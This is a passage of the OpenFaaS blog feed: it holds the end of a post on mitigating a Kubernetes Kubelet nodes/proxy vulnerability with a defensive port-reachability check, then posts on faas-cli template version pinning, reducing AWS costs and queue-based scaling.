      <td>Direct <code class="language-plaintext highlighter-rouge">kubectl</code> access to your own machine is fine, use non-production credentials</td>
    </tr>
    <tr>
      <td>Staging/shared clusters</td>
      <td>Grant only limited <code class="language-plaintext highlighter-rouge">kubectl</code> access, do not grant access to the <code class="language-plaintext highlighter-rouge">openfaas</code> namespace</td>
    </tr>
    <tr>
      <td>Production</td>
      <td><strong>Time-limited <code class="language-plaintext highlighter-rouge">kubectl</code> access to SRE/DevOps team only</strong></td>
    </tr>
  </tbody>
</table>

<p>Typically, companies that are SOC 2 or ISO 27001 compliant implement two roles: development, and deployment/operations. Development teams should generally not have access to the production cluster, and instead deploy via decoupled CI/CD pipelines or GitOps tools.</p>

<p><em>3. The service account requires network access to the Kubelet</em></p>

<p>You need to reach port 10250 on a node. In most production setups, this is firewalled or only accessible from within the cluster.</p>
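<p>As a quick check, you can probe the Kubelet port from a machine that should not have access. The sketch below is not an official tool, and assumes <code class="language-plaintext highlighter-rouge">NODE_IP</code> is set as in the earlier steps:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Probe the Kubelet API; a hardened setup should refuse the
# connection or time out
if curl -sk --max-time 3 "https://$NODE_IP:10250/pods" -o /dev/null; then
  echo "kubelet reachable - review firewall/security group rules"
else
  echo "kubelet not reachable from here"
fi
</code></pre></div></div>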

<p><em>4. Metrics require this permission</em></p>

<p>The <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code> permission exists because Prometheus (and similar tools) need to scrape <code class="language-plaintext highlighter-rouge">/metrics</code> and <code class="language-plaintext highlighter-rouge">/stats</code> endpoints from Kubelets. The permission is fundamental to monitoring itself; 67+ other cloud-native projects have the same requirement. OpenFaaS uses this data for monitoring, and for autoscaling on RAM/CPU usage.</p>

<h3 id="what-you-should-do">What you should do</h3>

<ol>
  <li><em>Don’t grant users kubectl access in production</em> - deployments should happen solely through GitOps tools or a CI/CD pipeline. Users should only have read-only “openfaas” IAM-based access via the OpenFaaS Dashboard, and no kubectl access of any form</li>
  <li><em>Network-segment the Kubelet API</em> - ensure port 10250 isn’t reachable from user workloads</li>
  <li><em>Use OpenFaaS IAM</em> - it provides function-level RBAC without exposing Kubernetes primitives</li>
  <li><em>Monitor for direct Kubelet access</em> - depending on your audit policy, you may see associated authorization checks (e.g. SubjectAccessReview events), even if the exec stream isn’t logged.</li>
</ol>

<h3 id="wrapping-up">Wrapping up</h3>

<p>This is a real quirk in Kubernetes RBAC—the fact that <code class="language-plaintext highlighter-rouge">GET</code> vs <code class="language-plaintext highlighter-rouge">CREATE</code> authorization depends on the transport protocol is surprising. Calling it “RCE” overstates the practical risk for well-architected deployments of OpenFaaS:</p>

<ul>
  <li>The affected service account is internal infrastructure</li>
  <li>Properly configured OpenFaaS users <em>should</em> never be able to interact with it directly</li>
  <li>Production is where real secrets are defined, and should use GitOps/CI deployments, not manual <code class="language-plaintext highlighter-rouge">kubectl</code> access</li>
</ul>

<p>We realise that you may have much more than OpenFaaS installed in your cluster, so now is the time to carefully review your security policies and user access.</p>

<p>If you have any questions or concerns, get in touch with us directly via our support inbox.</p>

<p>See also:</p>

<ul>
  <li><a href="https://grahamhelton.com/blog/nodes-proxy-rce">Graham Helton’s full disclosure</a></li>
  <li><a href="https://labs.iximiuz.com/tutorials/nodes-proxy-rce-c9e436a9">Interactive lab on iximiuz</a></li>
  <li><a href="https://github.com/kubernetes/enhancements/blob/master/keps/sig-node/2862-fine-grained-kubelet-authz/README.md">KEP-2862: Fine-Grained Kubelet API Authorization</a></li>
  <li><a href="https://slicervm.com">SlicerVM homepage</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="security" /><category term="kubernetes" /><category term="rce" /><summary type="html"><![CDATA[We spin up a Kubernetes cluster in record time to reproduce and address a security vulnerability in Kubernetes for OpenFaaS users.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-01-k8s-rce/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-01-k8s-rce/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Introducing Template Version Pinning for Functions</title><link href="https://www.openfaas.com/blog/pinned-template-versions/" rel="alternate" type="text/html" title="Introducing Template Version Pinning for Functions" /><published>2025-11-19T00:00:00+00:00</published><updated>2025-11-19T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/pinned-template-versions</id><content type="html" xml:base="https://www.openfaas.com/blog/pinned-template-versions/"><![CDATA[<p>As of version <code class="language-plaintext highlighter-rouge">0.18.0</code> of the faas-cli, you can now pin templates to a specific version via the stack.yaml file for more reproducible builds and to avoid unexpected changes.</p>

<p><strong>Why pin a template?</strong></p>

<p>Pinning the version of a template, just like any other dependency, can shield your functions from unexpected changes, and makes it easier to test variations before rolling them out more broadly.</p>

<p>A template such as <code class="language-plaintext highlighter-rouge">golang-middleware</code> may change for any number of reasons, whether that’s the underlying Go version, the HTTP server that’s hidden from users, or even the base image used for runtime.</p>

<p>You may also be experimenting, and change a template called <code class="language-plaintext highlighter-rouge">python3-http</code> from an Alpine Linux base to Debian. Older functions that rely on specific apk packages can remain on the previous version of the template until you’re ready to upgrade, while newer functions adopt the new one.</p>

<p>You may also need to enable certain logging or debug options, but don’t want to impact your existing functions. Creating a new named branch would mean you could switch out one or more functions to use that new version.</p>

<p><strong>How does it work?</strong></p>

<p>You can pin a template in three ways:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">lang: golang-middleware@1.0.0</code> - a release tag</li>
  <li><code class="language-plaintext highlighter-rouge">lang: golang-middleware@inproc</code> - a branch name</li>
  <li><code class="language-plaintext highlighter-rouge">lang: golang-middleware@sha-af599e</code> - a specific commit hash prefixed with <code class="language-plaintext highlighter-rouge">sha-</code> with a short or long SHA format</li>
</ul>
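<p>Putting it together, a pinned entry in stack.yaml might look like the following sketch, where the function and image names are illustrative:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>functions:
  my-function:
    lang: golang-middleware@1.0.0
    handler: ./my-function
    image: ghcr.io/example/my-function:0.1.0
</code></pre></div></div>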

<p>When specifying a release tag or branch name, an efficient shallow clone can be performed, however if you specify a SHA, a full clone of the repository is required to checkout that specific commit. A full clone could impact the performance of CI/CD pipelines if the repository is large or has a long history.</p>

<p>Finally, if you do not pin a version, then the latest version will be fetched from git whenever it is not available in the local <code class="language-plaintext highlighter-rouge">./template</code> folder.</p>

<blockquote>
  <p>Note: if you have added the <code class="language-plaintext highlighter-rouge">@</code> character into any of your custom template names, that will no longer be supported. So if you had written <code class="language-plaintext highlighter-rouge">node@22</code>, that should ideally be renamed to <code class="language-plaintext highlighter-rouge">node22</code> or <code class="language-plaintext highlighter-rouge">node-22</code> or similar.</p>
</blockquote>

<p>Whenever templates are expanded, a new <code class="language-plaintext highlighter-rouge">meta.json</code> file is written into each template’s folder. This file will make its way into the build of any function, so that you can understand which template and version was used to build a function image once it’s already been published.</p>

<p>For <code class="language-plaintext highlighter-rouge">golang-middleware@sha-2e6e262</code>, the following was written out:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"repository"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://github.com/openfaas/golang-http-template"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"ref_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha-2e6e262"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"sha"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2e6e262a724fc07d4eac75612c98a8870acf5606"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"written_at"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2025-11-13T18:20:02.109733766Z"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
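<p>Because <code class="language-plaintext highlighter-rouge">meta.json</code> is plain JSON on disk, you can check which commit a locally-expanded template came from. A minimal sketch, assuming the template was pulled into the conventional <code class="language-plaintext highlighter-rouge">./template</code> folder:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Show the exact commit recorded for a pulled template
grep '"sha"' template/golang-middleware/meta.json
</code></pre></div></div>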

<p><strong>How do I fetch pinned templates?</strong></p>

<p>The first way, is to create a new template and specify the version in the <code class="language-plaintext highlighter-rouge">new</code> command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli new <span class="nt">--lang</span> golang-middleware@1.0.0 my-function
</code></pre></div></div>

<p>This will create a new function in the current directory, and use the <code class="language-plaintext highlighter-rouge">golang-middleware</code> template at version <code class="language-plaintext highlighter-rouge">1.0.0</code>.</p>

<p>For existing functions, you can use the above <code class="language-plaintext highlighter-rouge">@</code> syntax and update the existing YAML:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">functions:
</span>  my-function:
<span class="gd">-   lang: golang-middleware
</span><span class="gi">+   lang: golang-middleware@1.0.0
</span></code></pre></div></div>

<p><strong>A note on the default templates repository</strong></p>

<p>There is a so-called <em>default</em> templates repository that is used whenever you run <code class="language-plaintext highlighter-rouge">faas-cli template pull</code> without specifying a repository or language. We don’t think this makes much sense going forward, since both the Go and Python templates now live in separate repositories.</p>

<p>If you want to explore the available templates, use the store commands instead:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli template store list
</code></pre></div></div>

<h2 id="so-should-you-start-pinning-template-versions-now">So should you start pinning template versions now?</h2>

<p>As a general rule of thumb, just as you would pin the version of any other asset you depend on, from Docker base images, to npm packages, to Go modules, to Python packages, setting a stable and known version of a template is an industry-standard practice.</p>

<p>It’s not required: just as a Dockerfile can use a <code class="language-plaintext highlighter-rouge">:latest</code> tag, templates can be used without any version suffix. Without pinning, you’ll always get the latest version of the template, including any fixes and updates to the base image, which will keep your CVE scanner happy. But if a change breaks assumptions made by your functions, it could cause issues down the line.</p>

<p>To find the release of any template in the store, find its Git repository and visit the Releases page, find the latest release or SHA in the HEAD branch, and update your stack.yaml file to use that version.</p>

<p>For instance: <code class="language-plaintext highlighter-rouge">faas-cli template store describe python3-http</code> will show you the URL for the repository, where you can find the latest Release tag, or if there hasn’t been a release for a while, the latest SHA in the default branch (usually <code class="language-plaintext highlighter-rouge">master</code>).</p>

<h2 id="wrapping-up">Wrapping up</h2>

<p>Whilst this may look like a simple change, it affects a large number of code paths, and whilst we have strived to minimise impact, there may be some edge cases that we have missed. If your CI pipeline breaks for any reason, you can pin the release binary of faas-cli to the last version before this feature was introduced: <a href="https://github.com/openfaas/faas-cli/releases"><code class="language-plaintext highlighter-rouge">0.17.8</code></a>.</p>

<p>The majority of the work has been carried out via the following <a href="https://github.com/openfaas/faas-cli/pull/1012">pull request</a> and tested by the full time team.</p>

<p>For those of us who do start pinning templates, remember to update them over time, either to the latest release as it becomes available, or to the latest SHA in the default branch.</p>

<p>For questions, comments, and suggestions reach out via your support channel of choice whether that’s Slack, the Customer Community on GitHub, or Email.</p>]]></content><author><name>OpenFaaS Ltd</name></author><category term="templates" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[As of version `0.18.0` of the faas-cli, you can now pin templates to a specific version via the stack.yaml file for more reproducible builds and to avoid unexpected changes.]]></summary></entry><entry><title type="html">Optimise OpenFaaS costs on AWS</title><link href="https://www.openfaas.com/blog/optimise-openfaas-aws-costs/" rel="alternate" type="text/html" title="Optimise OpenFaaS costs on AWS" /><published>2025-09-17T00:00:00+00:00</published><updated>2025-09-17T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/optimise-openfaas-aws-costs</id><content type="html" xml:base="https://www.openfaas.com/blog/optimise-openfaas-aws-costs/"><![CDATA[<p>Whilst OpenFaaS comes with predictable, flat-rate pricing, AWS is charged based upon consumption. We’ll explore how to save money and optimise our costs.</p>

<h2 id="introduction">Introduction</h2>

<p>There are a few common reasons why customers may decide to pay for OpenFaaS, and deploy it to AWS instead of using AWS Lambda, a serverless product that’s offered by AWS.</p>

<ul>
  <li>Control over limits - many settings that are restricted on AWS Lambda are configurable with OpenFaaS - from timeouts, to container runtimes, to CPU/memory limits.</li>
  <li>Portability - customers often start with an easy and convenient option like Lambda before obtaining an enterprise customer that requires an additional deployment on-premises or into another cloud provider. Lambda is locked into AWS.</li>
  <li>Cost savings - whilst Lambda starts within a free tier allowance, it can quickly get out of hand, and the cross-over point for a paid OpenFaaS license can be met quite quickly.</li>
  <li>No need for cold starts - OpenFaaS functions maintain 1/1 replicas by default, unless you configure scale to zero on them. So there’s no need for any cold start, for critical functions.</li>
  <li>No false economy - in order to keep Lambda costs reasonable, users will often under-provision the resources for their functions, or worse, over-provision them in order to get more vCPU.</li>
  <li>Kubernetes all the way - if your team already deploys to Kubernetes, then Lambda is orthogonal and means your developers have to build and operate code in two different systems.</li>
</ul>

<p>Of course there are other reasons, but these points stand out across customers.</p>

<table>
  <thead>
    <tr>
      <th>Aspect</th>
      <th>AWS Lambda</th>
      <th>OpenFaaS on EKS</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Free Tier</td>
      <td>Yes (limited)</td>
      <td>Free for personal use. Commercial use has predictable flat-rate licensing.</td>
    </tr>
    <tr>
      <td>Scaling Cost</td>
      <td>Per invocation + duration</td>
      <td>EC2 - can optimise with autoscaling, spot instances, and scale to zero</td>
    </tr>
    <tr>
      <td>Cold Starts</td>
      <td>Unavoidable unless kept “warm”</td>
      <td>No cold-start by default</td>
    </tr>
    <tr>
      <td>Speed up the runtime</td>
      <td>Add more RAM to get a bit more vCPU</td>
      <td>Pick any amount of vCPU or RAM, or allocate NVMe for super fast storage</td>
    </tr>
    <tr>
      <td>Access to GPUs</td>
      <td>Not available</td>
      <td>Yes, available using a node group with GPU instances</td>
    </tr>
    <tr>
      <td>Total Cost at Scale</td>
      <td>Can spike with traffic or increased product adoption/function execution time</td>
      <td>Stable costs. Spot instances can reduce EC2 by up to 90%</td>
    </tr>
    <tr>
      <td>Plays nicely with your Kubernetes deployments?</td>
      <td>No, orthogonal tooling and development</td>
      <td>Uses native Kubernetes objects including a CRD</td>
    </tr>
    <tr>
      <td>Customise the limits/environment for functions</td>
      <td>No</td>
      <td>Yes, most settings can be changed easily</td>
    </tr>
    <tr>
      <td>Time to deploy</td>
      <td>Can take minutes to rollout a new version via CloudFormation</td>
      <td>New version can be live in single-digit seconds</td>
    </tr>
    <tr>
      <td>Portability</td>
      <td>None</td>
      <td>Run the same functions on any Kubernetes cluster in the cloud or on-premises</td>
    </tr>
  </tbody>
</table>

<h2 id="knobs-and-dials-for-controlling-cost">Knobs and dials for controlling cost</h2>

<p><strong>Kubernetes control-plane</strong></p>

<p>Typically, you’ll deploy OpenFaaS to Kubernetes on AWS using their managed product <a href="https://aws.amazon.com/eks/">Elastic Kubernetes Service (EKS)</a>. EKS has a running cost per cluster of around $75 USD per month.</p>

<p>You can also self-manage Kubernetes with a tool like <a href="https://k3s.io/">K3s</a> for more flexibility. But bear in mind, if you’re staying on AWS, the cost per control plane is not going to add up to a lot.</p>

<p><strong>The unwritten costs of AWS</strong></p>

<p>This is beyond the scope of our article, which focuses on AWS EKS, <a href="https://aws.amazon.com/ec2/">EC2</a> and OpenFaaS, but take all the usual advice on optimising or reducing the use of CloudWatch, S3, NAT gateways, and other AWS services.</p>

<ul>
  <li>Use VPC endpoints for AWS services (e.g., S3, DynamoDB) to avoid public internet fees—savings of $0.01/GB or more.</li>
  <li>Minimize cross-AZ traffic by pinning functions to single-AZ nodes if latency allows.</li>
</ul>

<p>Take a detailed look at your monthly bill with <a href="https://aws.amazon.com/aws-cost-management/aws-cost-explorer/">AWS Cost Explorer</a>.</p>

<p>Avoid <a href="https://cloudgov.ai/resources/blog/how-to-save-money-on-amazon-eks-clusters-with-extended-support-version-updates/">EKS Extended Support fees</a>. EKS charges $0.60/hr per cluster if you linger on an unsupported Kubernetes version. Keep a quarterly upgrade policy (N-2 policy) to stay on the standard $0.10/hr control-plane price.</p>

<p><strong>Kubernetes nodes</strong></p>

<p>Kubernetes requires nodes to run your Pods, which are usually provided by AWS EC2 (virtual machines). AWS also offers products like Fargate, but Fargate tends to be more expensive, and slower to start up.</p>

<p>The cost of nodes can be optimised in three ways:</p>

<ol>
  <li>
    <p>Right-size your nodes to match the functions.</p>

    <p>By default, the kubelet limits a node to 110 Pods (on EKS the limit also depends on the instance type), so if you have a very large number of Pods for your functions, using larger nodes could be a false economy.</p>
  </li>
  <li>
    <p>Use autoscaling to scale nodes up and down based on demand.</p>

    <p>One of our customers runs a separate production and staging EKS cluster, but the staging cluster costs them very little. With scale to zero enabled on all their functions, they can get away with a single node that just runs the control-plane, at a very low cost. As soon as a function is started, it’ll either load up on the existing node, or a new one will be added and removed after the function scales back down to zero again.</p>

    <p>You’re likely aware of the benefits of AWS Savings Plans or Reserved Instances (RIs) for baseline nodes. If you are expecting your product to be in business for the next year or three, you can commit to purchase a certain amount of EC2 from AWS and get decent savings in return, without any risk of the instances being terminated.</p>
  </li>
  <li>
    <p>Use spot instances to save up to 90% of your costs.</p>

    <p>Spot instances are the most obvious way to save money on AWS, cutting EC2 bills by up to 90%, however they do have some downsides. Spot instances can be terminated at any time, with just two minutes’ notice. The open-source node-autoscaler built by AWS for EC2 called <a href="https://karpenter.sh/">Karpenter</a> can help you out here, but we also need to remember that a spot instance can take 1-2 minutes to start up, register, and start running a Pod. We created the <a href="https://openfaas.com/blog/headroom-controller/">Headroom Controller</a> to help reduce this delay, and the impact of instances being terminated.</p>
  </li>
</ol>

<p><strong>Check yourself</strong></p>

<p>We often see teams using nodes that are far too large, due to RAM/vCPU sizing that was taken from AWS Lambda, where you have to allocate more RAM to get additional vCPU quota. In one instance, a team needed to keep 300 functions “warm” and had historically allocated 3GB of RAM to each function. Why did they do that? When asked, they had no idea why that number was picked or how much RAM they actually needed.</p>

<p>Kubernetes doesn’t play by these rules: you can simply ask for what is required. The <a href="https://docs.openfaas.com/architecture/metrics/">metrics built into</a> OpenFaaS can be used to monitor the resource usage of your functions and adjust the node size accordingly.</p>
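
<p>Once you’ve observed real usage via the metrics, you can encode it directly in stack.yaml, which accepts explicit requests and limits per function. A sketch with an illustrative function name and values:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>functions:
  resize-image:
    requests:
      memory: 128Mi   # what the function typically uses under load
      cpu: 100m
    limits:
      memory: 256Mi   # hard cap to protect the node
</code></pre></div></div>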

<p><strong>Open your Arms</strong></p>

<p>In 2015, I had to recompile Docker from source to be able to run it on a Raspberry Pi. In fact I even had to recompile Go first as a prerequisite.</p>

<p>These days, Kubernetes and core tooling like ArgoCD, Helm, cert-manager, Istio, NATS, Prometheus, and Grafana all work flawlessly on the Arm architecture.</p>

<p>If you’re an AWS user, you should absolutely consider and experiment with running functions on Graviton instances. Whether that’s the whole collection, or just specific functions.</p>
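
<p>To run just specific functions on Graviton, one approach is a stack.yaml constraint on the standard architecture label, assuming the function’s image has been built for arm64. The function name here is illustrative:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>functions:
  thumbnailer:
    constraints:
      # Only schedule onto arm64 (e.g. Graviton) nodes
      - "kubernetes.io/arch=arm64"
</code></pre></div></div>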

<p>In return you’ll get fast performance and cost savings, whilst helping to reduce your carbon footprint since Arm chips tend to use way less energy.</p>

<p>The following page entitled <a href="https://docs.aws.amazon.com/prescriptive-guidance/latest/optimize-costs-microsoft-workloads/net-graviton.html">Use Graviton instances and containers</a> shows a 14.99% - 19.20% reduction in costs from using Graviton.</p>

<p>AWS Case study: <a href="https://aws.amazon.com/blogs/hpc/performance-gains-with-aws-graviton4-a-devitopro-case-study/">Performance gains with AWS Graviton4 – a DevitoPRO case study</a></p>

<p><strong>OpenFaaS licensing</strong></p>

<p>Each installation of OpenFaaS requires a separate license key.</p>

<p>If you have environments that sound like this: Dev, QA, UAT, Staging, Pre-Prod, DR, Prod, then OpenFaaS could work out quite expensive.</p>

<p>To optimise your costs, you may want to reevaluate whether you <em>really need</em> as many as 7 different Kubernetes clusters to test your functions in before finally rolling them out to production. For OpenFaaS for Enterprises, we can sometimes offer a custom package for this type of scenario, so definitely reach out to us for a call.</p>

<p>An alternative option when you have many environments is to use OpenFaaS for Enterprises and its multiple-namespace support. In this way, the various environments become Kubernetes namespaces that are isolated from one another. It’s also ideal for centrally managed IT, FaaS offered as a service to employees, and for multi-tenant environments.</p>

<p><strong>Scale to Zero for functions</strong></p>

<p><a href="https://docs.openfaas.com/openfaas-pro/scale-to-zero/">Scale to Zero</a> for functions is a feature that allows your functions to scale down to zero when they are not being used. This can help you save money on your AWS costs by reducing the number of EC2 instances that are running at any given time.</p>

<p>The idle timeout can be set on a per-function basis, and unlike AWS Lambda, it’s opt-in. No need to keep a background process invoking your function wastefully, just in case.</p>

<p>You can learn how autoscaling and scale to zero work together in this blog post: <a href="https://www.openfaas.com/blog/what-goes-up-must-come-down/">On Autoscaling - What Goes Up Must Come Down</a></p>
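
<p>Scale to Zero is enabled per function through labels in stack.yaml. A minimal sketch, with an illustrative function name and idle timeout:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>functions:
  importer:
    labels:
      com.openfaas.scale.zero: "true"
      com.openfaas.scale.zero-duration: "15m"   # idle period before scaling to zero
</code></pre></div></div>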

<p><strong>Delete old/unused functions</strong></p>

<p>If you are running a large installation of OpenFaaS and have accumulated a large number of functions, you can review the metrics to understand which are no longer being used.</p>

<p>There are two approaches:</p>

<ol>
  <li>Use the built-in <a href="https://prometheus.io/">Prometheus</a> metrics (defaults to 14 days of retention) to identify functions which can be removed, or use your own long-term storage, e.g. Datadog, to search back even further.</li>
  <li>If you’re using a multi-tenant installation of OpenFaaS for Enterprises, you can enable <a href="https://docs.openfaas.com/openfaas-pro/billing-metrics/">Billing Webhooks</a> and track invocations over time in a database. You can then use this data to run a clean-up via Cron.</li>
</ol>
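
<p>As a sketch of the first approach, a Prometheus recording rule can pre-compute invocations per function over the retention window, using the gateway’s standard <code class="language-plaintext highlighter-rouge">gateway_function_invocation_total</code> metric. Functions whose value stays at zero are candidates for removal; the rule name is illustrative:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>groups:
  - name: openfaas-cleanup
    rules:
      # Total invocations per function over the last 14 days
      - record: function:invocations:14d
        expr: sum by (function_name) (increase(gateway_function_invocation_total[14d]))
</code></pre></div></div>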

<p><strong>Do you really need Kubernetes?</strong></p>

<p>We built another version of OpenFaaS called <a href="https://docs.openfaas.com/deployment/edge/">OpenFaaS Edge</a>. It’s designed to run on a single VM or bare-metal host and can run up to 1000 functions.</p>

<p>OpenFaaS Edge is perfect for automations, background jobs, and other tasks that do not need to scale beyond a single machine or a single replica.</p>

<p>If you’re willing to do some legwork, it can also be installed on different hosts to shard functions across multiple machines.</p>

<p><strong>Consider other compute providers than AWS</strong></p>

<p>AWS EKS is probably the most popular platform our customers use to deploy and manage OpenFaaS, but it’s not the only game in town.</p>

<p>For one, other compute providers may offer a better baseline cost for their VMs, or larger instances for similar pricing.</p>

<p>If you really want to crush costs, then moving to bare-metal is a great option - it can enable much more density at a lower cost per function. Bare-metal doesn’t have to mean buying a datacenter, or installing OpenStack on a few racks.</p>

<p>Providers such as <a href="https://www.hetzner.com/">Hetzner</a> offer ridiculous value in comparison to AWS:</p>

<p>For x86_64:</p>
<ul>
  <li>EX44 (52 USD / mo) - 20 vCPU, 64GB RAM, 2x 512GB NVMe SSD</li>
  <li>A102 (139 USD / mo) - 32 vCPU, 128GB RAM, 2x 1.92TB NVMe SSD</li>
  <li>AX162-R (256 USD / mo) - 96 vCPU, 256GB RAM, 2x 1.92TB NVMe SSD</li>
</ul>

<p>For ARM:</p>
<ul>
  <li>RX220 (292 USD / mo) - 80 vCPU, 256GB RAM, 2x 3.84 TB NVMe SSD</li>
</ul>

<table>
  <thead>
    <tr>
      <th>Provider</th>
      <th>Instance / host</th>
      <th>Storage</th>
      <th>vCPU</th>
      <th>RAM</th>
      <th>Monthly cost</th>
      <th>Notes</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>AWS</td>
      <td>m5.4xlarge</td>
      <td>EBS</td>
      <td>16</td>
      <td>64GB</td>
      <td>~$300</td>
      <td>EBS is much slower than a local NVMe. Bandwidth costs extra. CPU is slower.</td>
    </tr>
    <tr>
      <td>Hetzner</td>
      <td>EX44</td>
      <td>NVMe</td>
      <td>20</td>
      <td>64GB</td>
      <td>$52</td>
      <td>Fast local NVMe, bare-metal density. Bandwidth is unmetered and included in cost.</td>
    </tr>
  </tbody>
</table>

<p>Now once you have bare-metal that may be capable of running well over 100 Pods, you’re still going to hit Kubernetes’ default limit of 110 Pods per node.</p>

<p>The answer is to slice each server into lightweight Firecracker microVMs, and we have a well-supported solution that works with OpenFaaS and Kubernetes.</p>

<p>Using <a href="https://slicervm.com">SlicerVM.com</a>, you can densely pack in as many nodes as you can fit by slicing up each server, and installing Highly Available Kubernetes using <a href="https://k3sup.dev/">K3sup</a>, or a similar Kubernetes distribution of your choice. SlicerVM.com can run over multiple machines, so you can retain high-availability without introducing a single point of failure.</p>

<p>Slicer can also autoscale Kubernetes nodes, meaning you can recycle them instead of having to manage them like pets. That means no need to worry about OS patching and updates.</p>

<p>Hetzner’s prices are remarkable, but <a href="https://docs.actuated.com/provision-server/">other companies</a> offer bare-metal in the cloud too.</p>

<p>What if you simply cannot move off AWS? Perhaps you’re halfway through a SOC 2 audit and can’t take on any new vendors? You can still do some initial research and experimentation, so that when you are in a position to review costs, you can make an accurate comparison.</p>

<p>Here’s how quick and easy it is to set up HA Kubernetes with SlicerVM:</p>

<div style="margin:0 auto;">
    <div class="ytcontainer">
        <iframe class="yt" allowfullscreen="" src="https://www.youtube.com/embed/YMPyNrYEVLA"></iframe>
    </div>
</div>

<p><a href="https://docs.slicervm.com/examples/ha-k3s/">Click here to view the documentation</a>.</p>

<h2 id="wrapping-up">Wrapping up</h2>

<p>Most OpenFaaS customers enable a few sane defaults and largely don’t mention the cost of their hosting provider. Why? Typically, the points below are already well understood. Maybe there’s something new here that could help you and your team? And if there’s something we didn’t mention, reach out and let us know!</p>

<p>From the top:</p>

<ul>
  <li>Do consider Arm and Graviton for a clear cost reduction and performance increase.</li>
  <li>Do use autoscaling nodes with something like Karpenter or an AWS-managed nodepool.</li>
  <li>Do consider whether spot instances can fit into your workflow.</li>
  <li>Do enable scale to zero where a modest coldstart is acceptable, or where functions run mainly asynchronously.</li>
  <li>Don’t overprovision CPU/RAM just because that’s what you had for a cloud function in the past.</li>
</ul>

<p>We realise that many teams have made a firm commitment to stay on AWS and cannot consider another vendor, or self-hosting. But, if you can, do consider bare-metal, or on-premises infrastructure. Maybe you could run part of your product on a different cloud provider, if it meant getting the 5-6x cost reductions we outlined in the example with Hetzner?</p>

<p>Finally, if you are in need of help, reach out to us using your existing communication channels with us. Or if you’re new here via our <a href="https://www.openfaas.com/pricing/">Pricing page</a>.</p>

<p>Related links:</p>

<ul>
  <li><a href="https://www.openfaas.com/blog/what-goes-up-must-come-down/">On Autoscaling - What Goes Up Must Come Down</a></li>
  <li><a href="https://www.openfaas.com/blog/eks-openfaas-karpenter/">Save costs on AWS EKS with OpenFaaS and Karpenter</a></li>
  <li><a href="https://www.openfaas.com/blog/scale-to-zero-gpus/">Scale to zero GPUs with OpenFaaS, Karpenter and AWS EKS</a></li>
  <li><a href="https://www.openfaas.com/blog/headroom-controller/">Scale Up Pods Faster in Kubernetes with Added Headroom</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="costs" /><category term="optimisation" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[Whilst OpenFaaS comes with predictable, flat-rate pricing, AWS is charged based upon consumption. We'll explore how to save money.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-09-reduce-costs/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-09-reduce-costs/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Introducing Queue Based Scaling for Functions</title><link href="https://www.openfaas.com/blog/queue-based-scaling/" rel="alternate" type="text/html" title="Introducing Queue Based Scaling for Functions" /><published>2025-07-29T00:00:00+00:00</published><updated>2025-07-29T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/queue-based-scaling</id><content type="html" xml:base="https://www.openfaas.com/blog/queue-based-scaling/"><![CDATA[<p>Queue-Based Scaling is a long awaited feature for OpenFaaS that matches queued requests to the exact amount of replicas almost instantly.</p>

<p>The initial version of OpenFaaS released in 2016 had effective, but rudimentary autoscaling based upon Requests Per Second (RPS) and was driven through AlertManager, a component of the Prometheus project. In 2019, with growing needs of commercial users with long running jobs, we rewrote the autoscaler to query metrics directly from functions and Kubernetes to fine-tune how functions scaled.</p>

<p>OpenFaaS already has a versatile set of scaling modes that can be fine tuned such as: Requests Per Second (RPS), Capacity (inflight connections/concurrency), CPU, and Custom scaling modes. This new mode is specialised to match the needs of large amounts of background tasks and long running processing tasks.</p>

<h2 id="what-is-queue-based-scaling">What is Queue-Based Scaling?</h2>

<p>Queue-Based Scaling is a new autoscaling mode for OpenFaaS functions. It is made possible by supporting changes that emit queue depth metrics for each function that’s being invoked asynchronously.</p>

<p>This new scaling mode fits well for functions that are:</p>

<ul>
  <li>Primarily invoked asynchronously</li>
  <li>May have a large backlog of requests</li>
  <li>Need to scale up to the maximum number of replicas as quickly as possible</li>
  <li>Run in batches, bursts, or spikes for minutes to hours</li>
</ul>

<p>Typical tasks include: Extract, Transform, Load (ETL) jobs, security/asset auditing and analysis, data processing, image processing, video transcoding, and file scanning, backup/synchronisation, and other background tasks.</p>

